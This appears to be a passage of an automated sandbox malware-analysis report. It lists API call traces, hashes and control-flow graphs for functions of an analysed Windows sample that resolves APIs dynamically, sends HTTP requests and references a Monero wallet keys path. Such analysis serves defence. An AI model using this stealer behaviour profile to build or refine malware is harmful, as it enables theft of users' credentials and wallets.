                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: fced0f83902ac69a7e3dba37a324d2824c85fce91ae5e31c105741390969d430
                                  • Instruction ID: fa0de84ab2b9f4e3b8ba09cd3ed4ecc388fb1cc95e2c262770495611c9430e68
                                  • Opcode Fuzzy Hash: fced0f83902ac69a7e3dba37a324d2824c85fce91ae5e31c105741390969d430
                                  • Instruction Fuzzy Hash: 6ED05EB590030CABCB14DFE098496DDBB79FB08325F0005A4D91572284EA305495CB65
                                  Function 00E79F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 e79f20-e79f2a 634 e7a346-e7a3da LoadLibraryA * 8 633->634 635 e79f30-e7a341 GetProcAddress * 43 633->635 636 e7a456-e7a45d 634->636 637 e7a3dc-e7a451 GetProcAddress * 5 634->637 635->634 638 e7a526-e7a52d 636->638 639 e7a463-e7a521 GetProcAddress * 8 636->639 637->636 640 e7a52f-e7a5a3 GetProcAddress * 5 638->640 641 e7a5a8-e7a5af 638->641 639->638 640->641 642 e7a647-e7a64e 641->642 643 e7a5b5-e7a642 GetProcAddress * 6 641->643 644 e7a654-e7a72a GetProcAddress * 9 642->644 645 e7a72f-e7a736 642->645 643->642 644->645 646 e7a7b2-e7a7b9 645->646 647 e7a738-e7a7ad GetProcAddress * 5 645->647 648 e7a7ec-e7a7f3 646->648 649 e7a7bb-e7a7e7 GetProcAddress * 2 646->649 647->646 650 e7a825-e7a82c 648->650 651 e7a7f5-e7a820 GetProcAddress * 2 648->651 649->648 652 e7a922-e7a929 650->652 653 e7a832-e7a91d GetProcAddress * 10 650->653 651->650 654 e7a98d-e7a994 652->654 655 e7a92b-e7a988 GetProcAddress * 4 652->655 653->652 656 e7a996-e7a9a9 GetProcAddress 654->656 657 e7a9ae-e7a9b5 654->657 655->654 656->657 658 e7a9b7-e7aa13 GetProcAddress * 4 657->658 659 e7aa18-e7aa19 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01725A88), ref: 00E79F3D
                                  • GetProcAddress.KERNEL32(75900000,01725B68), ref: 00E79F55
                                  • GetProcAddress.KERNEL32(75900000,01738F10), ref: 00E79F6E
                                  • GetProcAddress.KERNEL32(75900000,01738F70), ref: 00E79F86
                                  • GetProcAddress.KERNEL32(75900000,0173CD28), ref: 00E79F9E
                                  • GetProcAddress.KERNEL32(75900000,0173CD70), ref: 00E79FB7
                                  • GetProcAddress.KERNEL32(75900000,0172B098), ref: 00E79FCF
                                  • GetProcAddress.KERNEL32(75900000,0173CBF0), ref: 00E79FE7
                                  • GetProcAddress.KERNEL32(75900000,0173CD88), ref: 00E7A000
                                  • GetProcAddress.KERNEL32(75900000,0173CB78), ref: 00E7A018
                                  • GetProcAddress.KERNEL32(75900000,0173CCF8), ref: 00E7A030
                                  • GetProcAddress.KERNEL32(75900000,01725BA8), ref: 00E7A049
                                  • GetProcAddress.KERNEL32(75900000,01725808), ref: 00E7A061
                                  • GetProcAddress.KERNEL32(75900000,017258C8), ref: 00E7A079
                                  • GetProcAddress.KERNEL32(75900000,01725828), ref: 00E7A092
                                  • GetProcAddress.KERNEL32(75900000,0173CC50), ref: 00E7A0AA
                                  • GetProcAddress.KERNEL32(75900000,0173CD10), ref: 00E7A0C2
                                  • GetProcAddress.KERNEL32(75900000,0172B250), ref: 00E7A0DB
                                  • GetProcAddress.KERNEL32(75900000,01725848), ref: 00E7A0F3
                                  • GetProcAddress.KERNEL32(75900000,0173CD40), ref: 00E7A10B
                                  • GetProcAddress.KERNEL32(75900000,0173CDA0), ref: 00E7A124
                                  • GetProcAddress.KERNEL32(75900000,0173CBD8), ref: 00E7A13C
                                  • GetProcAddress.KERNEL32(75900000,0173CAB8), ref: 00E7A154
                                  • GetProcAddress.KERNEL32(75900000,01725868), ref: 00E7A16D
                                  • GetProcAddress.KERNEL32(75900000,0173CB48), ref: 00E7A185
                                  • GetProcAddress.KERNEL32(75900000,0173CC68), ref: 00E7A19D
                                  • GetProcAddress.KERNEL32(75900000,0173CAD0), ref: 00E7A1B6
                                  • GetProcAddress.KERNEL32(75900000,0173CCE0), ref: 00E7A1CE
                                  • GetProcAddress.KERNEL32(75900000,0173CC38), ref: 00E7A1E6
                                  • GetProcAddress.KERNEL32(75900000,0173CC08), ref: 00E7A1FF
                                  • GetProcAddress.KERNEL32(75900000,0173CCC8), ref: 00E7A217
                                  • GetProcAddress.KERNEL32(75900000,0173CC80), ref: 00E7A22F
                                  • GetProcAddress.KERNEL32(75900000,0173CD58), ref: 00E7A248
                                  • GetProcAddress.KERNEL32(75900000,01739F80), ref: 00E7A260
                                  • GetProcAddress.KERNEL32(75900000,0173CAE8), ref: 00E7A278
                                  • GetProcAddress.KERNEL32(75900000,0173CC98), ref: 00E7A291
                                  • GetProcAddress.KERNEL32(75900000,01725888), ref: 00E7A2A9
                                  • GetProcAddress.KERNEL32(75900000,0173CB00), ref: 00E7A2C1
                                  • GetProcAddress.KERNEL32(75900000,017258A8), ref: 00E7A2DA
                                  • GetProcAddress.KERNEL32(75900000,0173CB30), ref: 00E7A2F2
                                  • GetProcAddress.KERNEL32(75900000,0173CB18), ref: 00E7A30A
                                  • GetProcAddress.KERNEL32(75900000,017255C8), ref: 00E7A323
                                  • GetProcAddress.KERNEL32(75900000,017254A8), ref: 00E7A33B
                                  • LoadLibraryA.KERNEL32(0173CBA8,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A34D
                                  • LoadLibraryA.KERNEL32(0173CB60,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A35E
                                  • LoadLibraryA.KERNEL32(0173CCB0,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A370
                                  • LoadLibraryA.KERNEL32(0173CB90,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A382
                                  • LoadLibraryA.KERNEL32(0173CC20,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A393
                                  • LoadLibraryA.KERNEL32(0173CBC0,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3A5
                                  • LoadLibraryA.KERNEL32(0173CF08,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3B7
                                  • LoadLibraryA.KERNEL32(0173CF20,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3C8
                                  • GetProcAddress.KERNEL32(75FD0000,017255A8), ref: 00E7A3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0173CF38), ref: 00E7A402
                                  • GetProcAddress.KERNEL32(75FD0000,01738848), ref: 00E7A41A
                                  • GetProcAddress.KERNEL32(75FD0000,0173CE18), ref: 00E7A433
                                  • GetProcAddress.KERNEL32(75FD0000,01725648), ref: 00E7A44B
                                  • GetProcAddress.KERNEL32(734B0000,0172B2C8), ref: 00E7A470
                                  • GetProcAddress.KERNEL32(734B0000,01725468), ref: 00E7A489
                                  • GetProcAddress.KERNEL32(734B0000,0172B188), ref: 00E7A4A1
                                  • GetProcAddress.KERNEL32(734B0000,0173CED8), ref: 00E7A4B9
                                  • GetProcAddress.KERNEL32(734B0000,0173CE30), ref: 00E7A4D2
                                  • GetProcAddress.KERNEL32(734B0000,01725508), ref: 00E7A4EA
                                  • GetProcAddress.KERNEL32(734B0000,017255E8), ref: 00E7A502
                                  • GetProcAddress.KERNEL32(734B0000,0173CDD0), ref: 00E7A51B
                                  • GetProcAddress.KERNEL32(763B0000,01725668), ref: 00E7A53C
                                  • GetProcAddress.KERNEL32(763B0000,01725608), ref: 00E7A554
                                  • GetProcAddress.KERNEL32(763B0000,0173CE48), ref: 00E7A56D
                                  • GetProcAddress.KERNEL32(763B0000,0173CE60), ref: 00E7A585
                                  • GetProcAddress.KERNEL32(763B0000,01725628), ref: 00E7A59D
                                  • GetProcAddress.KERNEL32(750F0000,0172B0E8), ref: 00E7A5C3
                                  • GetProcAddress.KERNEL32(750F0000,0172B138), ref: 00E7A5DB
                                  • GetProcAddress.KERNEL32(750F0000,0173CDE8), ref: 00E7A5F3
                                  • GetProcAddress.KERNEL32(750F0000,01725688), ref: 00E7A60C
                                  • GetProcAddress.KERNEL32(750F0000,017256A8), ref: 00E7A624
                                  • GetProcAddress.KERNEL32(750F0000,0172B1B0), ref: 00E7A63C
                                  • GetProcAddress.KERNEL32(75A50000,0173CE90), ref: 00E7A662
                                  • GetProcAddress.KERNEL32(75A50000,01725708), ref: 00E7A67A
                                  • GetProcAddress.KERNEL32(75A50000,01738978), ref: 00E7A692
                                  • GetProcAddress.KERNEL32(75A50000,0173CE00), ref: 00E7A6AB
                                  • GetProcAddress.KERNEL32(75A50000,0173CE78), ref: 00E7A6C3
                                  • GetProcAddress.KERNEL32(75A50000,01725728), ref: 00E7A6DB
                                  • GetProcAddress.KERNEL32(75A50000,017257C8), ref: 00E7A6F4
                                  • GetProcAddress.KERNEL32(75A50000,0173CEF0), ref: 00E7A70C
                                  • GetProcAddress.KERNEL32(75A50000,0173CEA8), ref: 00E7A724
                                  • GetProcAddress.KERNEL32(75070000,01725408), ref: 00E7A746
                                  • GetProcAddress.KERNEL32(75070000,0173CEC0), ref: 00E7A75E
                                  • GetProcAddress.KERNEL32(75070000,0173CF50), ref: 00E7A776
                                  • GetProcAddress.KERNEL32(75070000,0173CF68), ref: 00E7A78F
                                  • GetProcAddress.KERNEL32(75070000,0173CDB8), ref: 00E7A7A7
                                  • GetProcAddress.KERNEL32(74E50000,01725568), ref: 00E7A7C8
                                  • GetProcAddress.KERNEL32(74E50000,01725748), ref: 00E7A7E1
                                  • GetProcAddress.KERNEL32(75320000,017254E8), ref: 00E7A802
                                  • GetProcAddress.KERNEL32(75320000,0173CA58), ref: 00E7A81A
                                  • GetProcAddress.KERNEL32(6F060000,017256C8), ref: 00E7A840
                                  • GetProcAddress.KERNEL32(6F060000,01725528), ref: 00E7A858
                                  • GetProcAddress.KERNEL32(6F060000,01725588), ref: 00E7A870
                                  • GetProcAddress.KERNEL32(6F060000,0173C9B0), ref: 00E7A889
                                  • GetProcAddress.KERNEL32(6F060000,01725768), ref: 00E7A8A1
                                  • GetProcAddress.KERNEL32(6F060000,017256E8), ref: 00E7A8B9
                                  • GetProcAddress.KERNEL32(6F060000,01725788), ref: 00E7A8D2
                                  • GetProcAddress.KERNEL32(6F060000,017257A8), ref: 00E7A8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E7A901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E7A917
                                  • GetProcAddress.KERNEL32(74E00000,0173C800), ref: 00E7A939
                                  • GetProcAddress.KERNEL32(74E00000,01738808), ref: 00E7A951
                                  • GetProcAddress.KERNEL32(74E00000,0173C8C0), ref: 00E7A969
                                  • GetProcAddress.KERNEL32(74E00000,0173C890), ref: 00E7A982
                                  • GetProcAddress.KERNEL32(74DF0000,017257E8), ref: 00E7A9A3
                                  • GetProcAddress.KERNEL32(6F9B0000,0173CA28), ref: 00E7A9C4
                                  • GetProcAddress.KERNEL32(6F9B0000,01725428), ref: 00E7A9DD
                                  • GetProcAddress.KERNEL32(6F9B0000,0173C7B8), ref: 00E7A9F5
                                  • GetProcAddress.KERNEL32(6F9B0000,0173C818), ref: 00E7AA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 6da48b25ee8b7ad32c14d030f3646780475ce42c9fd57d5184a9a44f9c05a853
                                  • Instruction ID: f3b056c675edeb2f9f3d8d4a99a62d87ac01f5429b19a973c4ddc7ca2faf1020
                                  • Opcode Fuzzy Hash: 6da48b25ee8b7ad32c14d030f3646780475ce42c9fd57d5184a9a44f9c05a853
                                  • Instruction Fuzzy Hash: 80621EF6510200AFC36CDFA8E9889567BFAA74D7013108A3AF929C369CD73599C0DF60
                                  Function 00E648D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 e648d0-e64992 call e7aab0 call e64800 call e7aa50 * 5 InternetOpenA StrCmpCA 816 e64994 801->816 817 e6499b-e6499f 801->817 816->817 818 e649a5-e64b1d call e78cf0 call e7ac30 call e7abb0 call e7ab10 * 2 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7ac30 call e7abb0 call e7ab10 * 2 InternetConnectA 817->818 819 e64f1b-e64f43 InternetCloseHandle call e7ade0 call e6a210 817->819 818->819 905 e64b23-e64b27 818->905 829 e64f45-e64f7d call e7ab30 call e7acc0 call e7abb0 call e7ab10 819->829 830 e64f82-e64ff2 call e78b20 * 2 call e7aab0 call e7ab10 * 8 819->830 829->830 906 e64b35 905->906 907 e64b29-e64b33 905->907 908 e64b3f-e64b72 HttpOpenRequestA 906->908 907->908 909 e64f0e-e64f15 InternetCloseHandle 908->909 910 e64b78-e64e78 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7aa50 call e7ac30 * 2 call e7abb0 call e7ab10 * 2 call e7ade0 lstrlen call e7ade0 * 2 lstrlen call e7ade0 HttpSendRequestA 908->910 909->819 1021 e64e82-e64eac InternetReadFile 910->1021 1022 e64eb7-e64f09 InternetCloseHandle call e7ab10 1021->1022 1023 e64eae-e64eb5 1021->1023 1022->909 1023->1022 1024 e64eb9-e64ef7 call e7acc0 call e7abb0 call e7ab10 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E64965
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E6498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E64B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E80DDE,00000000,?,?,00000000,?,",00000000,?,0173E398), ref: 00E64E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E64E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E64E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E64E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64F15
                                  • HttpOpenRequestA.WININET(00000000,0173E348,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E64B65
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e09e64f4ca57072fad7d2317e44753228d86435ba757d632192a9d2538f7a507
                                  • Instruction ID: 32bcba3fb986b49683746d0feb57b33a550b0f8b582577f9823feaa2de871c6c
                                  • Opcode Fuzzy Hash: e09e64f4ca57072fad7d2317e44753228d86435ba757d632192a9d2538f7a507
                                  • Instruction Fuzzy Hash: 8F12BD72910118ABDB19EB90DD62FEEB3B9AF54300F5495A9F10A72091DF706F48CF62
                                  Function 00E75760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 e75760-e757c7 call e75d20 call e7ab30 * 3 call e7aa50 * 4 1106 e757cc-e757d3 1090->1106 1107 e75827-e7589c call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1106->1107 1108 e757d5-e75806 call e7ab30 call e7aab0 call e61590 call e75440 1106->1108 1134 e758e3-e758f9 call e7ade0 StrCmpCA 1107->1134 1138 e7589e-e758de call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1107->1138 1124 e7580b-e75822 call e7abb0 call e7ab10 1108->1124 1124->1134 1139 e758ff-e75906 1134->1139 1140 e75a2c-e75a94 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1134->1140 1138->1134 1142 e7590c-e75913 1139->1142 1143 e75a2a-e75aaf call e7ade0 StrCmpCA 1139->1143 1269 e75d13-e75d16 1140->1269 1147 e75915-e75969 call e7ab30 call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1142->1147 1148 e7596e-e759e3 call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1142->1148 1162 e75ab5-e75abc 1143->1162 1163 e75be1-e75c49 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1143->1163 1147->1143 1148->1143 1246 e759e5-e75a25 call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1148->1246 1169 e75ac2-e75ac9 1162->1169 1170 e75bdf-e75c64 call e7ade0 StrCmpCA 1162->1170 1163->1269 1177 e75b23-e75b98 call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1169->1177 1178 e75acb-e75b1e call e7ab30 call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1169->1178 1198 e75c66-e75c71 Sleep 1170->1198 1199 e75c78-e75ce1 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1170->1199 1177->1170 1275 e75b9a-e75bda call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                                  APIs
                                    • Part of subcall function 00E7AB30: lstrlen.KERNEL32(UO,?,?,00E64F55,00E80DDF), ref: 00E7AB3B
                                    • Part of subcall function 00E7AB30: lstrcpy.KERNEL32(00E80DDF,00000000), ref: 00E7AB95
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E758F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75AA7
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E75440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75478
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E75510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75568
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E7557F
                                    • Part of subcall function 00E75510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E755B4
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E755D3
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E755FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E759DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00E75C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 9f0c51adf5e0cf4d22b6ec5252113bc42c727455bcae78db6f3e948fd63f85c6
                                  • Instruction ID: e3269194ac274d79e7f8100f73d279a752bd14089aeffb5ff6d8b865431da5ed
                                  • Opcode Fuzzy Hash: 9f0c51adf5e0cf4d22b6ec5252113bc42c727455bcae78db6f3e948fd63f85c6
                                  • Instruction Fuzzy Hash: DBE152729101049ACB18FBA0ED62EED73BDAF94340F54E578B51E76085EF706B48CB62
                                  Function 00E719F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
